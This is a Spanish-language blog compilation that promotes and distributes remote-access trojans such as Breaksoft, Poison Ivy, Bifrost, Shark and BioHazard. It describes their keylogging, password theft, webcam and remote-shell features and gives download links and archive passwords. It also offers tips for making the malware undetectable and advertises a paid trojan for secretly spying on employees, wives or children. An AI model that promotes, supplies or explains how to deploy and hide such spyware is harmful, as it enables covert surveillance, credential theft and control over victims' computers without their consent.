Hoy les traigo el codigo fuente del troyano Breaksoft supuestamente programado por Skyweb07 en Visual Basic 6.
El troyano no esta completamente terminado, pero si esta funcionando, conecta perfectamente y en windows xp es muy estable.
Esta en español y el codigo es muy facil de entender, a diferencia de lo que es el Biodox v1.0 open source de who. Ideal para los que neseciten una base para crear su propio troyano o RAT en VB6.



Se le pueden hacer muchas modificaciones, sobre todo al servidor, prinsipalmente se podria agregar el autoinicio para windows vista y cuentas limitadas. Y despues reemplazar en el servidor winsock por csocketmaster para que funcione en cualquier pc.



El troyano es detectado, pero se puede dejarlo indetectable cambiando el nombre de algunas variables vitales del servidor, tambien se puede cambiar el nombre de winsock WS por otro, eso generalmente funciona. Y por ultimo cambiar el nombre del proyecto, aplicacion, etc. No deberia haber problema con eso durante algun tiempo.

Descarga
Demo Breaksoft - codigo fuente (rapidshare)
Demo Breaksoft - codigo fuente (megaupload)

Mfucker es un nuevo troyano privado programado por el español IbArrA*.

El MFucker incluye todas las caracteristicas tipicas de cualquier otro troyano. Es estable, rapido y funciona perfectamente en Windows Vista.
Y obiamente incluye caracteristicas unicas, de las cuales se puede destacar las siguientes: Cuentas de Usuario, Adaptadores de Red, Puertos activos, Admin. de Dispositivos, Portapapeles, Contraseñas(MSN Messenger, No-IP DUC, Steam, CD Keys, Firefox, Internet Explorer), Creador de Scripts, Black Chat y varios mas (diversion, etc).
Y esta demas aclarar que es 100% indetectable a los antivirus por ser un troyano privado.









Caracteristicas oficiales:

[+] Información
- Información del PC
- Cuentas de Usuario
- Aplicaciones Instaladas
- Adaptadores de Red
- Puertos activos

[+] Manager
- Explorador de Archivos
- Procesos Activos
- Editor del Registro
- Admin. de Dispositivos
- Admin. de Servicios
- Portapapeles

[+] Contraseñas
- MSN Messenger
- No-IP DUC
- Steam
- CD Keys
- Firefox
- Internet Explorer

[+] Vigilancia
- Captura de Pantalla - Pantalla Completa
- Webcam
- KeyLogger

[+] Miscelaneo
- Creador de Scripts
- Apagado del PC
- Consola Remota
- Black Chat - Chat victima

[+] Otros
-

Por fin se termino la version 1.0 del ya conocido Spy Net Rat programado por Spy Net de Brasil.

Al dia de hoy parece ser uno de los mejores troyanos publicos que hay en la red, sobre todo por su cantidad de opciones, rapidez, y compatibilidad con Vista.

En esta version se mejoraron muchas cosas, y algo importante es el aumento de la velocidad de la captura de pantalla al enviar las imagenes en formato JPG.

Algunas imagenes:









Al troyano no lo recomiendo para usuarios principiantes, y no activen todas las opciones cuando creen el servidor, activen solo lo necesario.

Pueden cambiar el idioma a ingles en opciones, cuando salga una version en español la agrego en este mismo post.

Descarga

Spy-Net RAT 1.0 (megaupload)
Spy-Net RAT 1.0 (rapidshare)

Contraseña: troyanosyvirus.com.ar

Hoy se libero el Octopus v0.1, un nuevo troyano programado por Sharki en VB6.
El troyano es bastante indetectable al dia de hoy, y es ideal para principiantes, muy facil de configurar y basico en funciones.

Para que conecte deben seleccionar el puerto que utilizaron cuando crearon el server en OPCIONES.





Caracteristicas

[+] Bromas
[+] Procesos
[+] Shell Remota
[+] Keylogger
[+] Chat
[+] Contraseñas (Messenger,Iexplorer,No-ip)
[+] Notificacion sonora y estilo msn
[+] Administrador de Archivos
[+] Reconectar IP
[+] Abrir pagina web

Es la primera version de este troyano, asi que si encuentran algun bug o tienen algun problema lo comentan asi el programador lo repara para la proxima version.

Descarga
Octopus v0.1 (rapidshare.de)
Octopus v0.1 (megaupload)

Contraseña: troyanosyvirus.com.ar

Despues de hablar con Margera, algunos clientes y visitantes del blog se decidio liberar el fabuloso troyano Jumper trojan 3.7, que hace unas semanas estuvo a la venta por 80 Euros. Esta decicion favorecera a todos nuestros visitantes y clientes.



Caracteristicas Jumper Trojan 3.2:

-Administracion de archivos
-Captura de pantalla
-Captura de camara
-Keylogger (captura de teclas)
-Contraseñas
-Shell remota
-Aplicaciones instaladas
-Administrador de procesos
-Chat con la victima
-Listador de servicios
-Informacion de la pc remota
-Notas del servidor
-Estadisticas de conexion
-Cerrar server
-Desinstalar server
-Opciones
-Cambiar nombre

Al hacerse publica la version obiamente empezaran a detectar el server los antivirus, pero por ahora esta un 90% indetectable.

Descarga:
Jumper trojan 3.7 (Rapidshare)
Jumper trojan 3.7 (Megaupload)

Pass: troyanosyvirus.com.ar

Biodox es un troyano programador por WHO!, el creador del Elite protector. El troyano esta programado en Visual Basic 6, en cuanto a herramientas esta bastante completo, esta en varios idiomas entre ellos español. Por ahora lo detectan algunos antivirus, aunque se saltea bastantes.

Lo mejor de todo es que es codigo abierto y permite que cada uno lo modifique a su gusto, incluso que lo mejoren para despues publicar nuevas versiones con el codigo fuente incluido.

No lo recomiendo para los que recien se inician en el tema y no le funcionan los otros troyanos, ya que este es un poco mas complicado de usar que el resto, y no esta muy bien traducido al español, ademas ocupa 4 puertos distintos.






Descarga Binario:
Biodox v1.0 OpenSource Edition (rapidshare)
Biodox v1.0 OpenSource Edition (mediafire)

Descarga Codigo fuente:
Biodox v1.0 OpenSource Edition source code (rapidshare)
Biodox v1.0 OpenSource Edition source code (mediafire)

Como muchos saben, el Poison Ivy en su version publica tiene un limite de conexion de 200 victimas por cliente.
Esta version fue modificada por Toxix-Avenger utilizando Olly debugger para que pueda saltearse ese limite de 200 conexiones y asi conecten todas las victimas disponibles.

El limite de conexion tiene un proposito y es que no se "sobrecargue" la conexion de internet.
Con 600 victimas conectadas y 1Mb de ancho de banda se torna demasiado lenta conexion por internet. Y peor aun al activar la opcion para mostrar vistas en miniaturas del poison ivy, la conexion cae a los pocos minutos.
Asi que si quieren usar este cliente al maximo, necesitan una buena conexion de internet.

Si no tienen tantas victimas y quieren saber si de verdad soporta esa cantidad de conexiones, pueden crear muchos server locales con distintas mutex y veran que supera el limite.





Descarga
Poison Ivy 2.3.2 Mod - Bypass Connection Limit (rapidshare)

Poison Ivy 2.3.2 Mod - Bypass Connection Limit (mediafire)

Poison Ivy 2.3.2 Mod - Bypass Connection Limit (badongo)

Spy Net RAT es nuevo troyano creado por SpyNet. Todavia no hay mucha informacion sobre esta herramienta, parece que fue liberado ayer, Esta en portugues y hoy se saltea algunos antivirus como el KAV y AVG.
Se espera una traduccion a ingles dentro de poco, de todas formas se entiende muy bien, tiene las opciones tipicas de los troyanos mas conocidos, y por lo que vi es estable y rapido.



En la opcion para crear el servidor se destaca su opcion "Anti-Debugging" bastante completa.
Posee 2 metodos de Inicio y permite seleccionar icono del servidor y comprimir con UPX.



En cuanto a funciones parece muy completo pero con poca calidad, pueden ver todas en la siguiente imagen.



Testeen y opinen

Descarga:
Spy Net RAT 0.1 (rapidshare)
Spy Net RAT 0.1 (mediafire)

Analisis Anubis (para los desconfiados)

ACTUALIZADO: Nueva version con algunos bugs reparados

Descarga:
Spy Net RAT 0.2 (subido por el autor)
Contraseña del zip: Spy-Net

ACTUALIZADO: Nueva version traducida al ingles

Spy Net RAT 0.3 EN (subido por el autor)
Contraseña del zip: Spy-Net

Fuente: HackHound

Les dejo una recopilacion por Polifemo de todas las versiones del troyano Poison Ivy para todos los coleccionistas de troyanos como yo. Algunas mas detectadas que otras, otras mas estables, algunas privadas, etc.



Descarga:
Poison Ivy - Todas las versiones por Polifemo (rapidshare)
Poison Ivy - Todas las versiones por Polifemo (mediafire)

Otros links internos:
Poison Ivy 2.1.4 Version Privada
Poison ivy 2.3.1/2
Manual del poison ivy 2.3.0 By Raz!el
Dejando indetectable el poison ivy al nod32 con signaturezero

Pagina oficial: www.poisonivy-rat.com

Jumper trojan es la nueva version del espectacular troyano privado Biohazard, en esta nueva version se renovo totalmente el diseño y se actualizo gran parte del codigo, agregandole nuevas caracteristicas como la captura de contraseñas, estadisticas de conexiones, chat con la victima, informacion del sistema, etc.
Y por supuesto sigue siendo estable, rapido y 100% indetectable a todos los antivirus, incluyendo la defensa proactiva del kaspersky internet security 2009.




Caracteristicas Jumper Trojan 3.2:
-Administracion de archivos
-Captura de pantalla
-Captura de camara
-Keylogger (captura de teclas)
-Contraseñas
-Shell remota
-Aplicaciones instaladas
-Administrador de procesos
-Chat con la victima
-Listador de servicios
-Informacion de la pc remota
-Notas del servidor
-Estadisticas de conexion
-Cerrar server
-Desinstalar server
-Opciones
-Cambiar nombre

LIBERADO: http://troyanosyvirus.com.ar/2008/12/jumper-trojan-37-liberado.html

Version 4 proximamente privada

Esta es la primera version de un nuevo troyano liberado antes de ayer, al parecer es como una convinacion del shark, poison ivy y bifrost. Tiene las mejores de sus caracteristicas combinadas.

Lo que mas se destaca es su opcion Broadcast en el cliente, que permite trabajar con las victimas que se seleccionen de manera masiva, por ejemplo se pueden seleccionar todas las victimas y mostrar los passwords de sus pcs, o usar la consola de todas las victimas para hacer el famoso "ping de la muerte".

En la creacion del server se puede apreciar que se incluye un "file binder" y un "anti debuggin" bastante completo.

Y lo demas, tiene lo tipico de cualquier troyano, lo detecta nod32 y kav 7 al toque, pero para ser la primera version y beta esta muy completo.

Algunas imagenes

Para los que no lo conocian, les presento el Flux V1.0.1, la versión final de un exelente troyano creado a fines del 2004 por Gargamel.
En su época fue el mejor troyano junto con Bifrost. "Murió" porque se abandono el proyecto y se hiso muy detectado por los antivirus, mientras bifrost siguió con nuevas versiones, y el poison ivy recien se estaba desarrollando.
El troyano es bastante viejo y dificil de dejar indetectable, pero tiene algunas características únicas que hacen que valga la pena su uso.

Las caracteristicas que mas se destacan son:
-Su captura de pantalla es la mas rápida de todos los troyanos, se asemeja mas a la de un programa de administración remota.
-Permite ver los logs del keylogger y las contraseñas de las victimas aunque esten offline, solo es nesesario dejar el flux abierto para que capture las teclas y las contraseñas.
-Tiene la posibilidad de ver todas las webcams y escritorios de las victimas directamente desde la pantalla prinsipal del troyano.
-Tiene una opcion para descargar y ejecutar un archivo desde la web masivamente en las victimas seleccionadas.

caracteristicas oficiales:
- Actualizar el servidor del troyano
- Capturar contraseñas
- Capturar todo lo ingresado por el teclado
- Cerrar, apagar o reiniciar el sistema infectado
- Controlar el entorno Windows del equipo infectado
- Crear capturas de la pantalla actual
- Crear capturas de la Webcam
- Descargar y ejecutar archivos
- Desconectar y reconectar el equipo infectado a Internet
- Instalar un proxy SOCKS4
- Listar y eliminar procesos y tareas activas
- Mostrar ventanas con mensajes

Descarga:

Hoy salio al mercado del malware algo muy especial, se trata del nuevo Troyano privado BioHazard 3.2, es 100% indetectable a todos los antivirus y firewalls, es estable, rápido, de muy fácil uso y posee todas las características de un buen troyano.


El troyano posee nuevos métodos de inyección y ocultacion que permiten saltear a los antivirus como si nada incluyendo la defensa proactiva del Kaspersky 2009, esta demás decir que se saltea también a los mejores firewalls.
El codigo avanzado y limpio permite reducir el ping y mejorar la velocidad en la captura de pantalla y de cámara (supera notablemente al bifrost y poison ivy).
Metodo de autoinicio actualizado, para que el troyano se inicie perfectamente en Windows Vista.
La interfaz del BioHazard se diseño para que sea usado por personas con conocimiento nulos de informática, ideal tanto para quienes quieran espiar a sus empleados, esposas o hijos, sin que se den cuenta como para los que quieran obtener datos confidenciales o contraseñas especificas de alguna pc.



Características básicas:
-Administrador de archivos [Imagen]
-KeyLogger [Imagen]
-Captura de Pantalla [Imagen]
-Captura de cámara [Imagen]
-Procesos/Matar [Imagen]
-Shell remota [Imagen]
-Enviar Mensajes de error/advertencia [Imagen]
-Procesos inteligentes

Garantía
Garantía de indetectabilidad de 6 meses sin cargo, a partir de los 6 meses se cobrara una comisión mínima por su reemplazo.

Compras
El troyano BioHazard 3.2 Privado completo tiene un costo de 65 Euros, si estas interesado en comprarlo agrega a gbl-hack@hotmail.com o escribanos desde la PAGINA DE CONTACTO.

Tu pregunta no nos molesta, pregunta sin compromiso de compra.

Ya esta corriendo por la red la version 1.2d del bifrost, supuestamente es una modificacion de la version 1.2c, version privada y oficial creada por KSV, que estaba a la venta por unos 200 dolares.
Alguien se quejo de que la detectaban algunos avs y la publico...
Dentro de todo lo que mas se destaca con respecto a versiones anteriores es el "file manager", se le agregaron muchisimas mejoras.
Tambien el server ahora corre en windows vista 64 bits y es mas indetectable, aunque no creo que dure mucho tiempo, como paso con la version 1.2b.

Mejoras no oficiales por troyanosyvirus.com.ar:
-Mejoras en la ocultacion:
Indetectable a algunos antivirus y a todos los antivirus desactualizados hace unos meses.
Mejorado el sistema de salteo de firewall.

-Mejoras en la gestion de archivos:
Agregado gestor de descargas, permite cancelar, pausar, mover arriba, abajo, etc.
Aumentada la velocidad y estabilidad de las descargas.
Guarda datos en cache.
Permite ver vistas en miniaturas en imagenes jpg.
Agregada opcion para disminuir la velocidad de descarga asi se aumenta el ancho de banda.
Agregada opcion para reproducir sonidos con volumen maximo y por defecto.
Agregada vista "Treeview"

-Otras mejoras
El server corre en windows vista 64 bits, aunque el keylogger todabia sigue sin funcionar en este SO.
Agregada captura del clipboard en el keylogger.
Mejorada la estabilidad en el metodo de inicio activex.
Nueva columna en el cliente que muestra la ventana activa en cada victima.
Los datos de antivirus y firewall se extraen del centro de seguridad de windows.
Agregada funcion para captura de password de firefox 2.

Descarga:

Ya salio la version 3.1 del troyano shark, la ultima conocida era la 3.0, que era bastante inestable y cuando se tenia muchas victimas se desconectaban por razones desconocidas, en esta version se soluciono eso, ademas de ocultarse mas, para que sea mas dificil encontrarlo y borrarlo, por ahora es mas indetectable que la anterior, y tiene algunas pequeñas caracteristicas nuevas.

Changes
* Server-Summary had a mistake
* Client now uses Double-Variable Type for calculating Idletime
* Statistics Window not resizeable anymore
* Server-Auth-Window had an old sharK icon
* DOS Shell will be started automatically (when auto-refresh is activated)
* ADS is no longer set as default install folder since the installation routine needs more time
* RegExport & Plugin Installation working with Createprocess instead of shell() -> Faster!
* Plugin Uninstalling is way faster
* Faster File/Registry Listing
* Fixed some typos
* sharK Autosizes Columnheaders
* Regstartup-Resetting is more aggressive
* Server did not reconnect some times when disconnecting from the internet
* Some little changes
* sharK offline keylogger not noticeable anymore by lagging keyboards
* Added few idiotchecks (e.g. Servername Restriction)
* Faster GUI
* Renamed "Autostart Manager" -> "Startup Manager" and moved to "SYSTEM" menu
* Confirmation box before client exit
* Tr Queue has Minimize Button
* Better Ping Handling

Bug Fixes
* Sleep until next reboot now working
* Shark sometimes removed too many startup entries
* Fixed ShellWait() Routine -> Wait_For_Files_Termination (Server File Binder) is now working
* sharK adds Hash-Value of Path into Thumbpreview-Files for prevent problems with equal filenames
* shark crashed when making SIN Window too small
* sharK didn't list installed apps when Distributor, Version or Uninstallstring is missing
* Little fix in Pluginsystem
* Fixed Bug in Modulelisting/Pluginuploading
* 3.0 Servers are not updateable when having spaces in path

New Features
+ sharK shows total queued files/size in transfer queue + total ETA; transfer queue smaller sized
+ Memory Injection in Filebinder possible as Startmethod
+ You can move your transfer-items up/down in your queue
+ sharK uses Transfer-System for receiving keylogger-offlog -> VERY fast but not compatible to shark 3.0 server
+ You can hide the featurewindow taskbar
+ sharK will remove titlebar/form border when maximizing a feature window
+ sharK re-sets periphery blocks each 200ms when suspending/deactivating/locking stuff (e.g. keyboard) for prevent bypassing
+ Recoded Server installation part - MUCH faster installation!
+ You can capture only the foreground window optionally
+ Remote URL Monitor (Firefox, Netscape, Opera, Internet Explorer & Derivates)
+ Remote Clipboard Monitor
+ Keylogger seperates logs for each window
+ You can autosave the desk previews in the server folders
+ You can set "No Server Installation" in server builder
+ You can set "Also Start Server when installation fails" in server builder
+ You can see the desktop preview also in Report-Listview
+ Remote Chat Monitor (Working with: QIP, QIP Infium, Miranda, Miranda Me, ICQ Lite, ICQ6, Waste, Yahoo Msg, MSN 4)
+ Socks4 Reverse Proxy (STABLE! NO Beta anymore!)
+ Server will also start bound files when another server instance is already running
+ sharK does not use jpglib anymore, Pics are made smaller by setting BitsPerPixel --> Faster Screencap, Webcam Cam, Thumb & Preview Creation
+ You can set the remote clipboard
+ Serverprocess will be marked blue in Process/Open Port-List
+ You can sort almost every listview (asc & desc)
+ New Popup Style + Serverwindow will be opened on popup click
+ SharK now saves its settings via a configuration file, not via registry - old important settings are importable (port & password)
+ Profilesystem for Serverbuilder
+ Liteserver! (~600 Bytes)
+ sharK highlights own startup entry in Startup Manager
+ sharK does not connect all socket tunnels on connect. Only when opening the server window, shark will link the cam/screen/transfer socket
+ Startup Monitor: SharK servers will warn the clients when their startup entries are removed and aggressive mode is activated

Releases Notes
* Serversize: 168 KB (with fwb++, packed)
* Most Features are only working with a 3.1 server of course, some old features are not working on 3.0 servers due to syntax changes
* Due to massive changes, the sharK 3.1 client cannot interact anymore with shark 3.0.0 keyloggers
* The URL and Chat Monitor are unique features in a beta state. Wrong Results are possible.
* Due to the new connection system you can't use 3.1 servers with 3.0 clients

Descarga:

Para los que no saben ingles o no les gustan tener su bifrost en ingles, b# lo tradujo a español casi completamente, esta muy bueno el trabajo, muy completo, lo realizo con un poco de ayuda de polifemo y de los colaboradores de indetectables.net
El cliente sigue estando desempaquetado por lo que pueden seguir modificandolo si quieren.

Imagenes:

Descarga:

Hace unos dias salio la version 1.3.3 de un troyano llamado RCBF, es muy parecido al bifrost en su aspecto y en caracteristicas, pero este es indetectable por ahora y tiene nuevos metodos de salteo de firewall y ocultacion.
La creacion del server se realiza fuera del cliente con un builder que viene incluido en la descarga, al parecer no funciona en pcs remotas que ya tengan un server del bifrost instalado, a menos que se le de la opcion "update" desde el bifrost si ya se tiene como victima.
Al crear el server este ya viene incluido con el keylogger y el pack de extencion, a diferencia de el bifrost que da la opcion de elejirlo o no.

Imagenes:

Cuando analize el builder y el cliente me di cuenta que escanea unas ips (60.216.0.0/16 y 199.176.0.0/16) en el puerto 445, no se para que realiza eso, les aviso antes para que no digan que posteo cosas con "regalitos" eso viene de parte del autor y no se para que servira.
Les dejo los analisis de anubis

Ayer salio la version 4 del troyano turco, troyano que se caracteriza por su gran cantidad de herramientas y sus funciones FUN.
Por ahora es indetectable y tiene la opcion de cambiarle el lenguaje a español y a otros idiomas mas.

Lo nuevo:

• Remote Desktop feature added.You can view remote screen and control it via your keyboard and mouse.
  
• Now you can record video from remote webcam.
  
• Audio streaming feature added.
  
• Now you don't need to download images from remote computer,you can view them with thumbnail manager.
  
• You can get MSN logs with MSN Sniffer.
  
• You can block harmful web-pages on remote computer.
  
• You can manage remote computer with ms-dos commands.(Remote Shell)
  
• New functions added for server secrecy
  
• -Now it is harder to delete server
  
• -Server can't be show in registry,searching files,msconfig,etc.
  
• -Server can't be shown in ctrl+alt+del menu[Vista/Xp/95/98/ME].
  
• -Server prevents system restoring.It deletes all system restore points.
  
• Server size is %60 smaller now.
  
• Connection bug fixed
  
• Now server can't be dedectd by any anti-virus software,
  
• but i think it will be dedected soon.
  
• Some changes were made in Client appearance
  
• Now advanced keylogger can capture clipboard changements.
  
• You can install any file to remote computer from internet via Remote Downloader.
  
• Now you can get more information about remote computer.
  
• You can learn installed softwares on remote computer.
  
•  

En español:

Editado:
Cuando lo ejecutan al cliente modifica su pagina de inicio por la pagina principal del troyano del Internet Explorer 6.
Si nesecitan saber como sacarla dejen un comentario asi les respondo.

Descarga: